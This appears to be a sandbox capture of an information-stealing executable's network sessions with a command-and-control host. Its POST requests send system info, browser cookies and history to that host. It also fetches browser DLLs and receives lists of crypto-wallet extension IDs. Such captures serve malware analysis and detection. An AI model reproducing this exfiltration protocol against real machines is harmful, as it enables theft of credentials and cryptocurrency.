                                                                                                    Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIER


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:26 UTC | 200 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 267
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
2024-05-03 09:21:26 UTC | 267 | OUT |
                                                                                                    Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="message"plugins------BFHDAEHDAKEC
2024-05-03 09:21:26 UTC | 207 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 5416
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
2024-05-03 09:21:26 UTC | 5416 | IN |
                                                                                                    Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:27 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBA
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 6691
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:27 UTC6691OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 6c 7a 64 47 56 74 58 32 6c 75 5a 6d 38 75 64 48 68 30 0d 0a 2d 2d 2d
                                                                                                    Data Ascii: ------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZm8udHh0---
2024-05-03 09:21:27 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:28 UTC | 92 | OUT | GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
2024-05-03 09:21:28 UTC | 288 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:28 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 1106998
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 12:30:30 GMT
                                                                                                    ETag: "10e436-5e7ed3ec64580"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:30 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 4599
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:30 UTC4599OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62
                                                                                                    Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb
2024-05-03 09:21:30 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49743 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:31 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1451
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:31 UTC1451OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62
                                                                                                    Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb29nbGUgQ2hyb
2024-05-03 09:21:31 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49744 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:32 UTC | 200 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 359
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:32 UTC359OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d
                                                                                                    Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl---
2024-05-03 09:21:32 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49745 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:33 UTC | 200 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 359
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:33 UTC359OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d
                                                                                                    Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl---
2024-05-03 09:21:33 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49746 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:34 UTC | 92 | OUT | GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
2024-05-03 09:21:34 UTC | 286 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:34 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 685392
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "a7550-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    10 | 192.168.2.4 | 49747 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    2024-05-03 09:21:35 UTC | 92 | OUT | GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:36 UTC | 286 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:36 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 608080
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "94750-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    11 | 192.168.2.4 | 49748 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    2024-05-03 09:21:37 UTC | 93 | OUT | GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:38 UTC | 286 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:38 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 450024
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "6dde8-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: 08 83 eb 08 89 45 e0 89 5d dc 85 c0 0f 89 4b fe ff ff 8b 75 d8 8b 55 e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33
                                                                                                    Data Ascii: E]KuUu;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV33
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: 00 10 e8 07 56 00 00 8b c6 e8 66 c5 01 00 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28
                                                                                                    Data Ascii: VfUQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: e8 88 45 d8 50 8d 4d d8 c6 45 fc 0c e8 b4 18 ff ff ff 75 98 8b cf 33 f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10
                                                                                                    Data Ascii: EPMEu3s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49749 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:39 UTC | 89 | OUT | GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1
Host: shaffatta.com
Cache-Control: no-cache
2024-05-03 09:21:40 UTC | 288 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:21:39 GMT
Content-Type: application/x-msdos-program
Content-Length: 2046288
Connection: close
Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
ETag: "1f3950-5e7ea271b0900"
Accept-Ranges: bytes
X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49750 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:41 UTC | 93 | OUT | GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1
Host: shaffatta.com
Cache-Control: no-cache
2024-05-03 09:21:42 UTC | 286 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:21:41 GMT
Content-Type: application/x-msdos-program
Content-Length: 257872
Connection: close
Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
ETag: "3ef50-5e7ea271b0900"
Accept-Ranges: bytes
X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.449751168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:43 UTC97OUTGET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
2024-05-03 09:21:43 UTC | 285 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:43 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 80880
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "13bf0-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49752 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:44 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1067
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:44 UTC1067OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 4e 62 33 70 70 62 47 78 68 49 45 5a 70 63
                                                                                                    Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file_name"aGlzdG9yeVxNb3ppbGxhIEZpc
2024-05-03 09:21:45 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49753 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:47 UTC | 200 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIII
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 267
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:47 UTC267OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49
                                                                                                    Data Ascii: ------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="message"wallets------ECAKECAEGDHI
2024-05-03 09:21:47 UTC | 207 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
